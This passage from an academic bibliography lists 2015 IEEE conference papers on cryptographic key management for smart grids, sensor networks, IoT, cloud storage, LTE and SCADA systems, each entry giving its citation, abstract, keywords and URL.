Abstract: Advanced Metering Infrastructure (AMI) is composed of systems and networks for measuring, collecting, storing, analyzing, and exploiting energy usage related data. AMI is an enabling technology for Smart Grid (SG) and hence represents a privileged target for security attacks with potentially great damage against infrastructures and privacy. For this reason, security has been identified as one of the most challenging topics in AMI development, and designing an efficient Key Management Scheme (KMS) is one of first important steps. In this paper, we propose a new scalable and efficient key management scheme that we call Efficient and Scalable multi-group Key Management for AMI (eSKAMI) to secure data communications in an Advanced Metering Infrastructure. It is a key management scheme that can support unicast, multicast and broadcast communications based on an efficient Multi-group Key graph technique. An analysis of security and performance, and a comparision of our scheme with recently proposed schemes show that our KMS induces low storage overhead compared to existing solutions (reduction reaches 83%) without increasing the communication overhead.

Keywords: graph theory; smart power grids; telecommunication network management; telecommunication security; AMI development; KMS; SG; Smart Grid; advanced metering infrastructure; eSKAMI; efficient and scalable multigroup key management; efficient key management scheme; energy usage; multigroup key graph technique; privacy; scalable multigroup key management; secure data communications; security attacks; Authentication; Cryptography; Load management; Smart grids; Smart meters; Unicast; Advanced Metering Infrastructure (AMI); Key Management Scheme (KMS); Security; Smart Grid (SG) (ID#: 16-9355)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345355&isnumber=7345233

 

Zhang Ying; Zheng Bingxin, "A Multiple Key Management Method in Distributed Sensor Networks," in Control Conference (CCC), 2015 34th Chinese, pp. 7676-7681, 28-30 July 2015. doi: 10.1109/ChiCC.2015.7260858

Abstract: Wireless sensor network (WSNs) with a mobile sink node (MS) has been widely concerned. In view of the low security in the basic random key pre-distribution scheme, and the vital role of MS in the research on key management, this paper proposed a new scheme (PPBR scheme) based on a composite key management schemes with polynomial pool-based key pre-distribution and basic random key pre-distribution. The scheme uses polynomial t-degree property to increase the difficulty of cracking the key by enemy and enhance the network resilience to node capture, meanwhile, improves the storage efficiency as heterogeneous features between MS and sensor nodes. The low connectivity is solved by introducing path key tree-based establishment method. Theoretical analysis and simulation experiments show that the proposed scheme has advantages in terms of network security, connectivity and storage effectiveness under the comprehensive consideration on different performance evaluation.

Keywords: polynomials; telecommunication network management; telecommunication security; wireless sensor networks; MS; PPBR scheme; WSN; basic random key predistribution; composite key management schemes; distributed sensor networks; mobile sink node; multiple key management method; network resilience; polynomial pool; polynomial t-degree property; security; wireless sensor network; Mobile sink; composite scheme; heterogeneous networks; key management (ID#: 16-9356)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260858&isnumber=7259602

 

Yukun Zhou; Dan Feng; Wen Xia; Min Fu; Fangting Huang; Yucheng Zhang; Chunguang Li, "Secdep: A User-Aware Efficient Fine-Grained Secure Deduplication Scheme with Multi-Level Key Management," in Mass Storage Systems and Technologies (MSST), 2015 31st Symposium on, pp. 1-14, May 30 2015-June 5 2015. doi: 10.1109/MSST.2015.7208297

Abstract: Nowadays, many customers and enterprises backup their data to cloud storage that performs deduplication to save storage space and network bandwidth. Hence, how to perform secure deduplication becomes a critical challenge for cloud storage. According to our analysis, the state-of-the-art secure deduplication methods are not suitable for cross-user finegrained data deduplication. They either suffer brute-force attacks that can recover files falling into a known set, or incur large computation (time) overheads. Moreover, existing approaches of convergent key management incur large space overheads because of the huge number of chunks shared among users. Our observation that cross-user redundant data are mainly from the duplicate files, motivates us to propose an efficient secure deduplication scheme SecDep. SecDep employs User-Aware Convergent Encryption (UACE) and Multi-Level Key management (MLK) approaches. (1) UACE combines cross-user file-level and inside-user chunk-level deduplication, and exploits different secure policies among and inside users to minimize the computation overheads. Specifically, both of file-level and chunk-level deduplication use variants of Convergent Encryption (CE) to resist brute-force attacks. The major difference is that the file-level CE keys are generated by using a server-aided method to ensure security of cross-user deduplication, while the chunk-level keys are generated by using a user-aided method with lower computation overheads. (2) To reduce key space overheads, MLK uses file-level key to encrypt chunk-level keys so that the key space will not increase with the number of sharing users. Furthermore, MLK splits the file-level keys into share-level keys and distributes them to multiple key servers to ensure security and reliability of file-level keys. Our security analysis demonstrates that SecDep ensures data confidentiality and key security. Our experiment results based on several large real-world datasets show that SecDep is mor- time-efficient and key-space-efficient than the state-of-the-art secure deduplication approaches.

Keywords: cloud computing; cryptography; data privacy; MLK approaches; SecDep; UACE; brute-force attacks; cloud storage; computation overheads; cross-user deduplication security; cross-user file-level deduplication; cross-user finegrained data deduplication; data confidentiality; inside-user chunk-level deduplication; key security; key space overhead reduction; multilevel key management approaches; security analysis; server-aided method; user-aided method; user-aware convergent encryption; user-aware efficient fine-grained secure deduplication scheme; Encryption; Protocols; Resists; Servers (ID#: 16-9357)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208297&isnumber=7208272

 

Shuaiqi Hu, "A Hierarchical Key Management Scheme for Wireless Sensor Networks Based on Identity-Based Encryption," in Computer and Communications (ICCC), 2015 IEEE International Conference on, pp. 384-389, 10-11 Oct. 2015. doi: 10.1109/CompComm.2015.7387601

Abstract: Limited resources (such as energy, computing power, storage, and so on) make it impractical for wireless sensor networks (WSNs) to deploy traditional security schemes. In this paper, a hierarchical key management scheme is proposed on the basis of identity-based encryption (IBE). This proposed scheme not only converts the distributed flat architecture of the WSNs to a hierarchical architecture for better network management but also ensures the independence and security of the sub-networks. This paper firstly reviews the identity-based encryption, particularly, the Boneh-Franklin algorithm. Then a novel hierarchical key management scheme based on the basic Boneh-Franklin and Diffie-Hellman (DH) algorithms is proposed. At last, the security and efficiency of our scheme is discussed by comparing with other identity-based schemes for flat architecture of WSNs.

Keywords: cryptography; telecommunication network management; telecommunication security; wireless sensor networks; Boneh-Franklin algorithm; Boneh-Franklin algorithms; Diffie-Hellman algorithms; WSN; hierarchical key management scheme; identity-based encryption; identity-based schemes; network management; security; wireless sensor networks; Base stations; Computer architecture; Encryption; Identity-based encryption; Wireless sensor networks; Diffie-Hellman key exchange; IBE; WSNs; key management (ID#: 16-9358)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7387601&isnumber=7387523

 

Abdmeziem, M.R.; Tandjaoui, D.; Romdhani, I., "A Decentralized Batch-Based Group Key Management Protocol for Mobile Internet of Things (DBGK)," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 1109-1117, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.166

Abstract: It is anticipated that constrained devices in the Internet of Things (IoT) will often operate in groups to achieve collective monitoring or management tasks. For sensitive and mission-critical sensing tasks, securing multicast applications is therefore highly desirable. To secure group communications, several group key management protocols have been introduced. However, the majority of the proposed solutions are not adapted to the IoT and its strong processing, storage, and energy constraints. In this context, we introduce a novel decentralized and batch-based group key management protocol to secure multicast communications. Our protocol is simple and it reduces the rekeying overhead triggered by membership changes in dynamic and mobile groups and guarantees both backward and forward secrecy. To assess our protocol, we conduct a detailed analysis with respect to its communication and storage costs. This analysis is validated through simulation to highlight energy gains. The obtained results show that our protocol outperforms its peers with respect to the rekeying overhead and the mobility of members.

Keywords: Internet of Things; cryptographic protocols; data privacy; mobile computing; multicast communication; backward secrecy; communication costs; decentralized batch-based group key management protocol; dynamic groups; energy constraints; energy gains; forward secrecy; group communication security; membership changes; mobile Internet of Things; mobile groups; multicast applications; rekeying overhead reduction; sensitive mission-critical sensing tasks; storage costs; Context; Encryption; Mobile communication; Peer-to-peer computing; Protocols; Servers; Data confidentiality; Group key Management; Internet Of Things; Multicast communications; Security and Privacy (ID#: 16-9359)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363210&isnumber=7362962

 

Vijayalakshmi, V.; Sharmila, R.; Shalini, R., "Hierarchical Key Management Scheme using Hyper Elliptic Curve Cryptography in Wireless Sensor Networks," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219840

Abstract: Wireless Sensor Network (WSN) be a large scale network with thousands of tiny sensors moreover is of utmost importance as it is used in real time applications. Currently WSN is required for up-to-the-minute applications which include Internet of Things (IOT), Smart Card, Smart Grid, Smart Phone and Smart City. However the greatest issue in sensor network is secure communication for which key management is the primary objective. Existing key management techniques have many limitations such as prior deployment knowledge, transmission range, insecure communication and node captured by the adversary. The proposed novel Track-Sector Clustering (TSC) and Hyper Elliptic Curve Cryptography (HECC) provides better transmission range and secure communication. In TSC, the overall network is separated into circular tracks and triangular sectors. Power Aware Routing Protocol (PARP) was used for routing of data in TSC, which reduces the delay with increased packet delivery ratio. Further for secure routing HECC was implemented with 80 bits key size, which reduces the memory space and computational overhead than the existing Elliptic Curve Cryptography (ECC) key management scheme.

Keywords: pattern clustering; public key cryptography; routing protocols; telecommunication power management; telecommunication security; wireless sensor networks; ECC; IOT; Internet of Things; PARP; TSC; WSN; computational overhead reduction; data routing; hierarchical key management scheme; hyper elliptic curve cryptography; memory space reduction; packet delivery ratio; power aware routing protocol; secure communication; smart card; smart city; smart grid; smart phone; track-sector clustering; up-to-the-minute application; wireless sensor network; Convergence; Delays; Elliptic curve cryptography; Real-time systems; Throughput; Wireless sensor networks; Hyper Elliptic Curve Cryptography; Key Management Scheme; Power Aware Routing; Track-Sector Clustering; Wireless Sensor network (ID#: 16-9360)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219840&isnumber=7219823

 

Purushothama, B.R.; Koti, N., "Security Analysis of Tree and Non-Tree Based Group Key Management Schemes Under Strong Active Outsider Attack Model," in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, pp. 1825-1829, 10-13 Aug. 2015. doi: 10.1109/ICACCI.2015.7275882

Abstract: Key management schemes for secure group communications should satisfy two basic security requirements, backward secrecy and forward secrecy. Most of the prominent secure group key management schemes are shown to satisfy the basic security requirements considering passive attack model. In this paper, we analyze secure group key management schemes under active outsider attack model. In active outsider attack model, an adversary can compromise a legitimate user of the group. We show that some of the efficient tree based, non-tree based and proxy re-encryption based group key management schemes are not secure under active attack model. We evaluate the cost involved in making these schemes secure under active attack model. Also, we construct a secure version of these schemes and show that the schemes are secure under active outsider attack model.

Keywords: cryptography; trees (mathematics); backward secrecy; forward secrecy; nontree based group key management scheme security analysis; passive attack model; proxy reencryption scheme; secure group communication; strong active outsider attack model; tree based group key management scheme security analysis; Analytical models; Computational modeling; Cryptography; Polynomials; Servers; Vegetation (ID#: 16-9361)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275882&isnumber=7275573

 

Shi Li; Inshil Doh; Kijoon Chae, "Key Management Mechanism in ALTO/SDN Based CDNi Architecture," in Information Networking (ICOIN), 2015 International Conference on, pp. 110-115, 12-14 Jan. 2015. doi: 10.1109/ICOIN.2015.7057866

Abstract: Content delivery network interconnection (CDNi) as a new interactive network which inherits all of the advantages of single CDN. Moreover, CDNs supported by different network operators can communicate with each other directly through the interfaces between them. Meanwhile, the interactivity also brings some security issues. In this paper, we propose a new CDNi communication architecture which combined with another two efficient technologies, ALTO and SDN. Based on this architecture, a key generation and distribution mechanism is also proposed to ensure the security communication of content in CDNi. From the analysis result, we can proof that it is scarcely possible for attackers to break our security system.

Keywords: computer network security; optimisation; software defined networking; telecommunication traffic; ALTO-SDN based CDNi communication architecture; application-layer traffic optimization; content communication security; content delivery network interconnection; interactive network; key distribution mechanism; key management mechanism; software defined networking; Computer architecture; Equations; Routing; Security; Servers; Symmetric matrices; Vectors; ALTO service; CDNi; Key management; SDN; Security (ID#: 16-9362)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7057866&isnumber=7057846

 

Caixia Zhang; Lili Qu; Xiangdong Wang; Jianbin Xiong, "An Efficient Self-Healing Group Key Management with Lower Storage for Wireless Sensor Network," in Computer Science and Mechanical Automation (CSMA), 2015 International Conference on, pp.124-128, 23-25 Oct. 2015. doi: 10.1109/CSMA.2015.31

Abstract: For the problems of energy constrained and the channel insecurity in group communication of WSN, we propose a self-healing group key management protocol based on polynomial and some algorithm. This protocol can recover the lost group key without transmitting message once more. The method can improve the security of the channel, while consuming less energy. The performance analysis of this protocol shows that we can achieve forward secrecy and backward secrecy and communication security with lower energy consumption, which can expand the range of applications of wireless sensor networks while improving life.

Keywords: public key cryptography; wireless sensor networks; WSN; backward secrecy; channel insecurity; channel security; communication security; forward secrecy; group communication; self-healing group key management protocol; wireless sensor networks; Automation; Cryptography; Energy consumption; rotocols; Wireless sensor networks; Yttrium; lower storage; security; self-healing; wireless sensor network (ID#: 16-9363)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371635&isnumber=7371543

 

Chen Hong, "Towards a Identity-Based Key Management System for Vehicular Ad Hoc Network," in Measuring Technology and Mechatronics Automation (ICMTMA), 2015 Seventh International Conference on, pp. 1359-1362, 13-14 June 2015. doi: 10.1109/ICMTMA.2015.332

Abstract: Current solutions either do not consider the main requisites of these networks, as the absence of central administration or self organization, or do not detail with important operations, such as key revocation or key update. Thus, this paper presents (Identity-Based Cryptography), a complete and fully self-organized identity-based key management scheme for mobile ad hoc networks. Does not depend on any central authority or third trusted party, even during the network formation. Also, provides mechanisms to revoke the private key of malicious or compromised nodes and ways to update the keys of non-compromised nodes. Simulation results show that is effective while it does not impose a high communication overhead to the system.

Keywords: mobility management (mobile radio); telecommunication security; vehicular ad hoc networks; central authority; malicious node; mobile ad hoc network; noncompromised node; private key; self-organized identity-based key management scheme; third trusted party; vehicular ad hoc network; Identity-based encryption; Mobile ad hoc networks; Simulation; Wireless communication; Identity-Based Cryptography; Security; vehicular ad hoc network (ID#: 16-9364)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7263828&isnumber=7263490

 

Treytl, A.; Sauter, T., "Hierarchical Key Management for Smart Grids," in Systems Engineering (ISSE), 2015 IEEE International Symposium on, pp. 496-500, 28-30 Sept. 2015. doi: 10.1109/SysEng.2015.7302803

Abstract: Data transfer in smart grids is sensitive and must be properly protected. However, proven security approaches from the IT world can be used only to a certain extent. In particular, resource limitations in the communication network for the last mile and the field devices must be taken into account, which makes popular asymmetric public key infrastructures difficult to apply. This paper reviews current security architectures and proposes an efficient solution based on symmetric keys, which has advantages for highly resource limited devices and networks. Key management follows a four-level hierarchical approach, where the actual session keys used for regular data exchange in the smart grid can be derived automatically by the field devices to increase system security and save communication bandwidth. Execution time measurements of the cryptographic algorithms demonstrate the efficiency of the approach.

Keywords: power system security; public key cryptography; smart power grids; time measurement; asymmetric public key infrastructures; communication bandwidth; communication network; cryptographic algorithms; data transfer; execution time measurements; four-level hierarchical approach; hierarchical key management; regular data exchange; security architectures; session keys; smart grids; symmetric keys; Bandwidth; Computer architecture; Encryption; Program processors; Smart grids; communication network; key management; security; smart grid (ID#: 16-9365)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7302803&isnumber=7302498

 

Fakhrey, H.; Boussakta, S.; Tiwari, R.; Al-Mathehaji, Y.; Bystrov, A., "Location-Dependent Key Management Protocol for a WSN with a Random Selected Cell Reporter," in Communications (ICC), 2015 IEEE International Conference on, pp. 6300-6305, 8-12 June 2015. doi: 10.1109/ICC.2015.7249328

Abstract: A wireless sensor network (WSN) employed to serve smart city applications is usually located in a vast and vulnerable territory. In order to secure vital and critical information, the security requirements of data confidentiality, authenticity and availability should be guaranteed. One of the leading key management schemes is based on using location information to generate security credentials. However, existing location-dependent schemes have disadvantages related to cell capture caused by a threshold number of nodes (e) being compromised. This paper presents a location-dependent key management protocol with a random selected cell reporter, LKMP-RSCR, where a set of cell reporters are selected randomly by the base station (BS) to provide a third level of report endorsement. In the LKMP-RSCR, an adversary would need to compromise all cell reporters in addition to endorsement (e) nodes to capture a particular cell. The LKMP-RSCR is presented and evaluated using an extensive analysis that shows a significant enhancement achieved in comparison with LEDS and MKMP schemes in terms of data confidentiality (85%), authenticity (35%) and availability (85%).

Keywords: cryptographic protocols; wireless sensor networks; LKMP-RSCR; WSN; authenticity; availability; data confidentiality; location-dependent key management protocol; random selected cell reporter; security requirements; smart city applications; wireless sensor network; Ad hoc networks; Authentication; Cryptography; Light emitting diodes; Probability; Wireless sensor networks; End-to-End Security; Location- Dependent Key Management System; Smart Cities; Wireless Sensor Network (WSN) (ID#: 16-9366)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7249328&isnumber=7248285

 

Kumar Reddy K, P.; Chandavarkar, B.R., "Mitigation of Desynchronization Attack During Inter-eNodeB Handover Key Management in LTE," in Contemporary Computing (IC3), 2015 Eighth International Conference on, pp. 561-566, 20-22 Aug. 2015. doi: 10.1109/IC3.2015.7346744

Abstract: In recent years, 3rd Generation Partnership Project (3GPP) is taking on a pivotal role in standardizing the 4G network. Long Term Evolution (LTE) is a standard by the 3rd Generation Partnership Project (3GPP) and its main goal is to transform into 4G from mobile cellular wireless technology. Optimization of radio access techniques along with the improvement in the LTE systems lead 3GPP in developing the 4G standard as the next generation of LTE-Advanced (LTE-A) wireless networks. The support of full inter-working and flat Internet Protocol (IP) connectivity with heterogeneous wireless access networks in both 3GPP LTE and LTE-A architecture leads to new challenges in the security aspects. The primary challenge of LTE is to provide security to end users. Despite of security architecture available in LTE, still there exist vulnerabilities which can compromise the whole network. The major contribution of this paper is to design a new mitigation scheme which reduces the impact of desynchronization attack during the inter-eNodeB handover key management in LTE. Desynchronization attack can lead to serious consequences like compromise of User Equipment (UE) and eNodeB, during inter-eNodeB handover key management.

Keywords: 3G mobile communication; 4G mobile communication; Long Term Evolution; cryptography; mobility management (mobile radio);telecommunication security; 3GPP; 4G network; LTE-Advanced; Third Generation Partnership Project; desynchronization attack mitigation; flat internet protocol; intereNodeB handover key management; interworking protocol; long term evolution; Base stations; Computer architecture; Handover; Long Term Evolution; Mathematical model; Security; 3GPP; AKA; LTE-Security; desynchronization attack; eNodeB; handover key management (ID#: 16-9367)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346744&isnumber=7346637

 

Zongmin Cui; Haitao Lv; Chao Yin; Guangyong Gao; Caixue Zhou, "Efficient Key Management for IOT Owner in the Cloud," in Big Data and Cloud Computing (BDCloud), 2015 IEEE Fifth International Conference on,  pp. 56-61, 26-28 Aug. 2015. doi: 10.1109/BDCloud.2015.40

Abstract: IOT (internet of things) owner may not want their sensitive data to be public in the cloud. However, the client operated by IOT owner may be too lightweight to provide the encryption/decryption service. To remove the issue, we propose a novel solution to minimize the access control cost for IOT owner. First, we present a security model for IOT with minimal cost of IOT owner client without encryption, in which we transfer the encryption/decryption from the client to the cloud. Second, we propose an access control model to minimize the key management cost for IOT owner. Third, we provide an authorization update method to minimize the cost dynamically. In our method, the sensitive data from IOT owner is only available to the authorized user. Each IOT owner needs only to manage a single password, by which the IOT owner can always manage his/her sensitive data and authorization no matter the authorization policy how to change. Experimental results show that our approach significantly outperforms most of existing methods with efficient key management for IOT owner.

Keywords: Internet of Things; authorisation; cloud computing; cryptography; Internet of Things; IoT; access control cost; authorization update method; cloud computing; decryption service; encryption service; key management cost; password management; security model; Authorization; Cloud computing; Encryption; Servers; Authorization update; Cloud computing; IOT owner key management; Internet of things; Sensitive data (ID#: 16-9368)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7310716&isnumber=7310694

 

Nengcheng Chen; Wenying Du, "Spatial-Temporal Based Integrated Management for Smart City: Framework, Key Techniques and Implementation," in Geoinformatics, 2015 23rd International Conference on, pp. 1-4, 19-21 June 2015. doi: 10.1109/GEOINFORMATICS.2015.7378628

Abstract: With the rapid development of urban economy and the enormous increase of urban population, a series of problems arise, including safety and security protections of citizens, emergency events responding and management, monitoring and maintaining of urban infrastructures, and urban environment pollution treatment, etc. These problems undoubtedly hinder the development of cities and the quality improvement of residents' lives, whereas a novel and efficient management method is absent for the solving of these problems. This paper proposes the method of spatial-temporal integrated management for smart cities (STIMSC), which is used to manage diverse resources of cities, builds the overall architecture of integrated management, and form an integrated management mode for cities by employing the techniques of collaborative sensing, model web, and intelligent service. The pipe leakage event in Taiyuan, China on June 23, 2014 is chosen as the use case for the validation of STIMSC. Results demonstrate that STIMSC is able to realize the integration of heterogeneous resources in the service-oriented way for decision makers, make effective action plan for enterprises, and gain more evacuation time for residents. STIMSC is of great significance in the efficiency improvement of city management.

Keywords: Internet; emergency management; quality management; security; smart cities; town and country planning; STIMSC; city management; collaborative sensing; emergency event management; emergency event responding; integrated management mode; intelligent service; model Web; pipe leakage event; quality improvement; safety protection; security protection; service-oriented way; smart city; spatial-temporal based integrated management; spatial-temporal integrated management for smart cities; urban economy; urban environment pollution treatment; urban infrastructures; urban population; Computational modeling; Metadata; Visualization; collaborative sensing; integrated management; intelligent service; model web; smart city (ID#: 16-9369)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7378628&isnumber=7378547

 

Chokngamwong, R.; Jirabutr, N., "Mobile Digital Right Management with Enhanced Security using Limited-Use Session Keys," in Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON), 2015 12th International Conference on, pp. 1-5, 24-27 June 2015. doi: 10.1109/ECTICon.2015.7207069

Abstract: Digital contents have been increasing rapidly in which they can contribute to business-to-customer productivity growth. A number of Mobile Digital Rights Management (MDRM) protocols have been proposed. The aim of MDRM is to distribute digital contents to consumers in a controlled manner that can protect the copyright of digital contents. Some protocols do not provide necessary security properties; hence, they may not be suitable for mobile network. This paper introduces MDRM protocols for distribution of digital contents. The proposed protocols deploy limited-use offline session key generation and distribution technique to enhance security and importantly make it lightweight and more secure. Moreover, the proposed protocols are suitable for current mobile infrastructure and thus maintain ease of use.

Keywords: content management; copy protection; copyright; cryptographic protocols; digital rights management; mobile computing; mobile radio; telecommunication security; MDRM protocol; business-to-customer productivity growth; consumers; digital content copyright protection; digital content distribution; limited-use offline session key generation; mobile digital right management; mobile infrastructure; mobile network; security enhancement; security property; Copyright protection; Encryption; Licenses; Mobile communication; Protocols; Data Protection; MDRM; Mobile Digital Right Management; Mobile Security; OMA DRM; ROAP (ID#: 16-9370)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7207069&isnumber=7206924

 

Sone, M.E., "Efficient Key Management Scheme to Enhance Security-Throughput Trade-Off Performance in Wireless Networks," in Science and Information Conference (SAI), 2015, pp. 1249-1256, 28-30 July 2015. doi: 10.1109/SAI.2015.7237304

Abstract: Wireless network security schemes are characterized by parameters such as processing time and the avalanche property. These parameters tend to adversely affect the efficiency of the wireless network namely; throughput of network and lost/ retransmitted packets. The undesirable effects of processing time and avalanche property are due to the fact that, existing implementation of wireless security schemes is based on symmetric cryptography. The avalanche property makes a block cipher secure but in turn reduces throughput since it causes them to be sensitive to bit errors. In addition, processing time through the many rounds required to establish a session key increases the round trip time (RTT) for a message significantly. Hence there is need to implement a wireless security scheme which could minimize both the processing time and the avalanche property. The paper introduces a new algorithm for wireless security based on RSA public-key cryptography, convolutional codes and subband coding. It describes implementation using small integer key lengths thereby minimizing processing time and avalanche property since it is based on asymmetric cryptography. Future works in this study can show that, the implementation can fit in a single FPGA device which is close to a wireless transmitter and receiver at access points (APs).

Keywords: convolutional codes; error statistics; public key cryptography; radio networks; radio receivers; radio transmitters; telecommunication network management; telecommunication security; AP; RSA public-key cryptography; RTT; access points; asymmetric cryptography; avalanche property; bit errors; block cipher security; convolutional codes; efficient key management scheme; lost-retransmitted packets; round trip time; subband coding; symmetric cryptography; trade-off performance; wireless network security schemes; wireless receiver; wireless transmitter; Convolutional codes; Cryptography; Encoding; Filter banks; Forward error correction; Throughput; Cipher text; Field Programmable Gate Array (FPGA); Residue Number System (RNS); Rivest, Shamir and Adleman (RSA) cryptography; Trellis Coded Modulation (TCM); moduli set; residue number system (RNS) (ID#: 16-9371)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237304&isnumber=7237120

 

Salvi, S.; Sanjay, H.A.; Deepika, K.M.; Rangavittala, S.R., "An Encryption, Compression And Key(ECK) Management Based Data Security Framework For Infrastructure as a Service in Cloud," in Advance Computing Conference (IACC), 2015 IEEE International, pp. 872-876, 12-13 June 2015. doi: 10.1109/IADCC.2015.7154830

Abstract: Cloud Computing is the recent technology that is based on shared pool of resources and provides features like Ubiquitous access, multi-tenancy, flexibility, scalability and pay as you use, which makes it more resource efficient and cost effective. But Cloud-based systems open unfamiliar threats in authentication and authorization. Explicit authorization accordance must be defined at smallest level, especially in multi-tenant environments. The liaison between Cloud Service Provider & customer must also be clearly mentioned in relation like who holds administrative rights and indirect access to privileged customer information. Moreover the scenario of cloud in educational and research community is still developing and has some security concerns. This paper provides a brief review about Cloud Security concerns for adoption of cloud computing in data sensitive research and technology aided education. Also this paper proposes, ECK based framework for securing end-user data in Community Cloud. Implications and considerations for additional research are provided as well.

Keywords: authorisation; cloud computing; cryptography; data compression; message authentication; ECK management; authentication; authorization; cloud computing security; cloud-based system; data security framework; encryption compression and key management; infrastructure as a service; Cloud computing; Computer architecture; Encryption; Virtual machining; Cloud Computing; Data Securtiy; Educational Cloud(Edu-Cloud); Virtual Machine(VM); Xen Server (ID#: 16-9372)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154830&isnumber=7154658

 

Senan, S.; Hashim, A.A.; Othman, R.; Messikh, A.; Zeki, A.M., "Dynamic Batch Rekeying Scheme using Multiple Logical Key Trees for Secure Multicast Communication," in Computing, Control, Networking, Electronics and Embedded Systems Engineering (ICCNEEE), 2015 International Conference on, pp. 47-51, 7-9 Sept. 2015. doi: 10.1109/ICCNEEE.2015.7381426

Abstract: A group key management has an important role in multicast security in order to achieve data integrity and confidentiality. The session key is a common secret key for a group of users in key trees that is shared securely and efficiently among them. It is used to encrypt other session keys and transmitted data in order to protect group communication. This paper proposed a new key management protocol using Multiple Logical key trees for dynamic groups. To minimize the communication overhead of rekeying process, a one-way key derivation are integrated with multiple logical key trees. New keys created by the server of the key tree are not sent to the members who are able to derive their own keys. As a result each rekeying process requires less number of encrypted keys sent within the group tree. The performance analysis of the proposed scheme shows that it has less communication cost than the other compared protocols.

Keywords: computer network security; cryptographic protocols; data integrity; multicast protocols; private key cryptography; trees (mathematics);communication overhead minimization; data confidentiality; data integrity; dynamic batch rekeying scheme; group communication protection; group key management; key management protocol; multicast communication security; multiple logical key tree; secret key; session key encryption; Multicast security; batch rekeying; group key management (ID#: 16-9373)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381426&isnumber=7381351

 

Tawde, R.; Nivangune, A.; Sankhe, M., "Cyber Security in Smart Grid SCADA Automation Systems," in Innovations in Information, Embedded and Communication Systems (ICIIECS), 2015 International Conference on, pp. 1-5, 19-20 March 2015. doi: 10.1109/ICIIECS.2015.7192918

Abstract: Cyber attacks into modern SCADA (Supervisory Control and Data Acquisition) lead to vulnerabilities as International Electrotechnical Commission (IEC) 61850 has no security features inbuilt. IEC 62351 is used to secure IEC 61850 profiles. SCADA power utilities, using IEC 61850 protocol, are facing problem of key management as it is not outlined in IEC 62351. In recent times, key management in SCADA networks is a major challenge. Due to lack of resources and low latency requirements in SCADA networks, it is infeasible to use traditional key management schemes such as RSA based PKI (Public Key Infrastructure).This paper will give a general insight on the development of security mechanisms to secure substation level SCADA communication which has a Bump-in-the-wire (Bitw) device. Finally, we propose a security solution to eliminate the problem of key management by integrating CDAC's key distribution and management protocol Sec-KeyD into IEC 62351 to secure IEC 61850 protocol.

Keywords: IEC standards; SCADA systems; protocols; public key cryptography; smart power grids; substation automation; Bitw device; CDAC key distribution protocol; CDAC key management protocol; IEC 61850 protocol; IEC 62351;International Electrotechnical Commission standard; RSA based PKI key management scheme; Sec-KeyD protocol; bump-in-the-wire device;cyber attack security; public key infrastructure; smart grid SCADA automation system; substation level SCADA communication security mechanism; supervisory control and data acquisition system; Authentication; Cryptography; IEC Standards; Protocols; Substations; Authentication; Bump-in-the wire; IEC 61850; IEC 62351; Key Management (ID#: 16-9374)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7192918&isnumber=7192777

 

Gopalakrishnan, S.; GaneshKumar, P., "Secure and Efficient Transmission in Wireless Network using Key Authentication Based Secured Multicasting Technique," in Advanced Computing and Communication Systems, 2015 International Conference on, pp. 1-4, 5-7 Jan. 2015. doi: 10.1109/ICACCS.2015.7324064

Abstract: Multicasting is one of the fast and simple ways of transmitting a same data to multiple people at the same time in the network which saves the transmission time. Since multicasting is taking part of transmitting to multiple people there are chances for creating vulnerability against various attacks. In the existing system, MKMP - Multicast Key Management protocol is used in which the session information about the users is given to the sub stations for various groups. It is difficult to understand the user list under the sub stations, and there are chances to miss or mismatch the user list with the station information. To overcome this problem, in this paper KABSM-[Key Authentication based Secured Multicasting] approach is introduced and it provides a citizenship key for activating every functionality of the nodes in the network like, entering into a region, while communication etc. In this approach a dynamic key is generated and assigned to entire nodes in the network. The simulation result shows that the efficiency of the proposed approach is more sleuth to the existing approach.

Keywords: cryptographic protocols; multicast communication; radio networks; telecommunication security; KABSM; MKMP; dynamic key; key authentication based secured multicasting technique; multicast key management protocol; secure transmission; session information; station information; transmission time; user list; wireless network; Authentication; IEEE 802.11 Standard; Multicast communication; Protocols; Throughput; Wireless LAN; Wireless networks; Key Management; Multicast Key Management; Secured Multicasting; WLAN (ID#: 16-9375)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7324064&isnumber=7324014

 

Kavitha, R.J.; Caroline, B.E., "Hybrid Cryptographic Technique for Heterogeneous Wireless Sensor Networks," in Communications and Signal Processing (ICCSP), 2015 International Conference on, pp. 1016-1020, 2-4 April 2015. doi: 10.1109/ICCSP.2015.7322653

